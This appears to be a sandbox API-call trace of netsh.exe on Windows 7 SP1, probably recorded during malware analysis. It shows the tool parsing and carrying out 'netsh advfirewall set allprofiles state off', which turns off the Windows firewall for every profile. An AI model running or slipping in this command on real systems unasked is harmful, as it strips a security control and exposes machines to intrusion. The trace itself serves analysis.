[0183.758] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x2bf7e0 [0183.759] GetProcessHeap () returned 0x250000 [0183.759] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ad60 | out: hHeap=0x250000) returned 1 [0183.759] RegisterContext () returned 0x0 [0183.759] GetProcessHeap () returned 0x250000 [0183.759] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1c0) returned 0x2bf940 [0183.759] GetProcessHeap () returned 0x250000 [0183.759] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2bf7e0 | out: hHeap=0x250000) returned 1 [0183.759] RegisterContext () returned 0x0 [0183.759] GetProcessHeap () returned 0x250000 [0183.759] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c480 [0183.759] GetProcessHeap () returned 0x250000 [0183.759] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.760] RegisterContext () returned 0x0 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe0) returned 0x29ad60 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c480 | out: hHeap=0x250000) returned 1 [0183.760] RegisterContext () returned 0x0 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x150) returned 0x2bf7e0 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ad60 | out: hHeap=0x250000) returned 1 [0183.760] RegisterContext () returned 0x0 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c480 [0183.760] GetProcessHeap () returned 0x250000 [0183.760] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.761] RegisterContext () returned 0x0 [0183.761] GetProcessHeap () returned 0x250000 [0183.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c500 [0183.761] GetProcessHeap () returned 0x250000 [0183.761] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0183.761] RegisterContext () returned 0x0 [0183.761] GetProcessHeap () returned 0x250000 [0183.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x930) returned 0x2d8010 [0183.761] GetProcessHeap () returned 0x250000 [0183.761] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d7740 | out: hHeap=0x250000) returned 1 [0183.761] RegisterContext () returned 0x0 [0183.761] GetProcessHeap () returned 0x250000 [0183.761] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x9a0) returned 0x2d8950 [0183.762] GetProcessHeap () returned 0x250000 [0183.762] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8010 | out: hHeap=0x250000) returned 1 [0188.435] RegisterContext () returned 0x0 [0188.435] GetProcessHeap () returned 0x250000 [0188.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xa10) returned 0x2ddf20 [0188.435] GetProcessHeap () returned 0x250000 [0188.435] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8950 | out: hHeap=0x250000) returned 1 [0188.435] RegisterContext () returned 0x0 [0188.435] GetProcessHeap () returned 0x250000 [0188.435] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x70) returned 0x27c680 [0188.435] GetProcessHeap () returned 0x250000 [0188.435] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0188.435] SetConsoleCtrlHandler (HandlerRoutine=0xd09198, Add=1) returned 1 [0188.436] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0188.436] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0188.436] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0188.439] FreeLibrary (hLibModule=0x77940000) returned 1 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-?") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-h") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="?") returned 34 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="/?") returned 50 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-v") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-a") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-c") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-f") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-r") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-u") returned 52 [0188.439] _wcsicmp (_String1="Advfirewall", _String2="-p") returned 52 [0188.439] GetVersionExW (in: lpVersionInformation=0x1678a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1678a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0188.439] _vsnwprintf (in: _Buffer=0xd15b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x167868 | out: _Buffer="6.1.7601") returned 8 [0188.439] _vsnwprintf (in: _Buffer=0xd15fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x167868 | out: _Buffer="7601") returned 4 [0188.439] _vsnwprintf (in: _Buffer=0xd15d90, _BufferCount=0x103, _Format="%d", _ArgList=0x167868 | out: _Buffer="1") returned 1 [0188.439] _vsnwprintf (in: _Buffer=0xd161b0, _BufferCount=0x103, _Format="%d", _ArgList=0x167868 | out: _Buffer="0") returned 1 [0188.439] GetProcessHeap () returned 0x250000 [0188.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7100 [0188.439] GetProcessHeap () returned 0x250000 [0188.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7120 [0188.439] GetProcessHeap () returned 0x250000 [0188.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2c7140 [0188.439] GetProcessHeap () returned 0x250000 [0188.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7160 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2c7180 [0188.440] wcscpy_s (in: _Destination=0x2c7180, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7140 | out: hHeap=0x250000) returned 1 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7120 | out: hHeap=0x250000) returned 1 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7120 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7140 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4c) returned 0x2bd9d0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c71a0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c71c0 [0188.440] wcscpy_s (in: _Destination=0x2c71c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d88f0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29dd80 [0188.440] wcscpy_s (in: _Destination=0x29dd80, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8910 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8930 [0188.440] wcscpy_s (in: _Destination=0x2d8930, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8950 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8970 [0188.440] wcscpy_s (in: _Destination=0x2d8970, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.440] GetProcessHeap () returned 0x250000 [0188.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8990 [0188.440] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29dda0 [0188.441] wcscpy_s (in: _Destination=0x29dda0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2bd9d0 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7140 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7140 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d89b0 [0188.441] wcscpy_s (in: _Destination=0x2d89b0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c71c0 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c71a0 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c71a0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c71c0 [0188.441] wcscpy_s (in: _Destination=0x2c71c0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d89b0 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2c7140 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2c7140 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29ddb0 [0188.441] wcscpy_s (in: _Destination=0x29ddb0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29dd80 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d88f0 | out: hHeap=0x250000) returned 1 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d88f0 [0188.441] GetProcessHeap () returned 0x250000 [0188.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d89b0 [0188.441] wcscpy_s (in: _Destination=0x2d89b0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.441] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8930 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8910 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8910 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8930 [0188.442] wcscpy_s (in: _Destination=0x2d8930, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8970 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8950 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8950 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29dd80 [0188.442] wcscpy_s (in: _Destination=0x29dd80, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29dda0 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8990 | out: hHeap=0x250000) returned 1 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x30) returned 0x2da350 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8990 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8970 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29dda0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d89d0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d89f0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29ddc0 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8a10 [0188.442] GetProcessHeap () returned 0x250000 [0188.442] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2d8a10, Size=0xe) returned 0x2d8a30 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2d8a30, Size=0x24) returned 0x2d6bc0 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2d6bc0, Size=0x26) returned 0x2d6bf0 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2d6bf0, Size=0x2c) returned 0x2da390 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2da390, Size=0x2e) returned 0x2da3d0 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2da3d0, Size=0x44) returned 0x2bcc90 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2bcc90, Size=0x46) returned 0x2bcce0 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2bcce0, Size=0x50) returned 0x2bd9d0 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2bd9d0, Size=0x52) returned 0x2bda90 [0188.443] GetProcessHeap () returned 0x250000 [0188.443] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2bda90, Size=0x58) returned 0x2bd9d0 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2bd9d0 | out: hHeap=0x250000) returned 1 [0188.449] _wcsnicmp (_String1="Advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0188.449] _wcsnicmp (_String1="Advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0188.449] _wcsnicmp (_String1="Advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0188.449] _wcsnicmp (_String1="Advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0188.449] _wcsnicmp (_String1="Advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8a30 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8a10 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x58) returned 0x2bd9d0 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8a50 [0188.449] GetProcessHeap () returned 0x250000 [0188.449] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8a70 [0188.450] wcscpy_s (in: _Destination=0x2d8a70, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8a90 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8ab0 [0188.450] wcscpy_s (in: _Destination=0x2d8ab0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8ad0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29ddd0 [0188.450] wcscpy_s (in: _Destination=0x29ddd0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8af0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8b10 [0188.450] wcscpy_s (in: _Destination=0x2d8b10, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8b30 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x2d8b50 [0188.450] wcscpy_s (in: _Destination=0x2d8b50, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8b70 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x29dde0 [0188.450] wcscpy_s (in: _Destination=0x29dde0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2bd9d0 | out: hHeap=0x250000) returned 1 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8a10 | out: hHeap=0x250000) returned 1 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8ab0 | out: hHeap=0x250000) returned 1 [0188.450] GetProcessHeap () returned 0x250000 [0188.450] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x18) returned 0x2d8ab0 [0188.450] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0188.450] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0188.450] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0188.450] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0188.450] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0188.450] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0188.451] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0188.451] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0188.451] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0188.451] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0188.451] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0188.451] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0188.451] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0188.451] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x126610*=0x0 | out: _String="domainprofile", _Context=0x126610*=0x0) returned="domainprofile" [0188.451] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0188.451] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x126640*=0x0 | out: _String="privateprofile", _Context=0x126640*=0x0) returned="privateprofile" [0188.451] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0188.451] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x126670*=0x0 | out: _String="publicprofile", _Context=0x126670*=0x0) returned="publicprofile" [0188.451] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0188.451] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x1266a0*=0x0 | out: _String="currentprofile", _Context=0x1266a0*=0x0) returned="currentprofile" [0188.451] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0188.451] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x11c370*=0x0 | out: _String="allprofiles", _Context=0x11c370*=0x0) returned="allprofiles" [0188.451] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0188.451] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0194.005] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x163550, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0194.006] FormatMessageW (in: dwFlags=0x500, lpSource=0x163550, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x163530, nSize=0x0, Arguments=0x163540 | out: lpBuffer="峠,") returned 0x5 [0194.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.006] GetConsoleOutputCP () returned 0x1b5 [0194.006] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0194.006] GetProcessHeap () returned 0x250000 [0194.006] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x6) returned 0x29ddf0 [0194.006] GetConsoleOutputCP () returned 0x1b5 [0194.006] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x29ddf0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0194.006] WriteFile (in: hFile=0x7, lpBuffer=0x29ddf0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1634e0, lpOverlapped=0x0 | out: lpBuffer=0x29ddf0*, lpNumberOfBytesWritten=0x1634e0*=0x5, lpOverlapped=0x0) returned 1 [0194.007] GetProcessHeap () returned 0x250000 [0194.007] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ddf0 | out: hHeap=0x250000) returned 1 [0194.007] LocalFree (hMem=0x2c5ce0) returned 0x0 [0194.007] FormatMessageW (in: dwFlags=0x500, lpSource=0xd01504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x167560, nSize=0x0, Arguments=0x167570 | out: lpBuffer="訐-") returned 0x2 [0194.008] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.008] GetConsoleOutputCP () returned 0x1b5 [0194.008] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0194.008] GetProcessHeap () returned 0x250000 [0194.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x3) returned 0x29ddf0 [0194.008] GetConsoleOutputCP () returned 0x1b5 [0194.008] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x29ddf0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0194.008] WriteFile (in: hFile=0x7, lpBuffer=0x29ddf0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x167510, lpOverlapped=0x0 | out: lpBuffer=0x29ddf0*, lpNumberOfBytesWritten=0x167510*=0x2, lpOverlapped=0x0) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29ddf0 | out: hHeap=0x250000) returned 1 [0194.009] LocalFree (hMem=0x2d8a10) returned 0x0 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8990 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d8970 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x29dda0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d89d0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 0x250000 [0194.009] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2d89f0 | out: hHeap=0x250000) returned 1 [0194.009] GetProcessHeap () returned 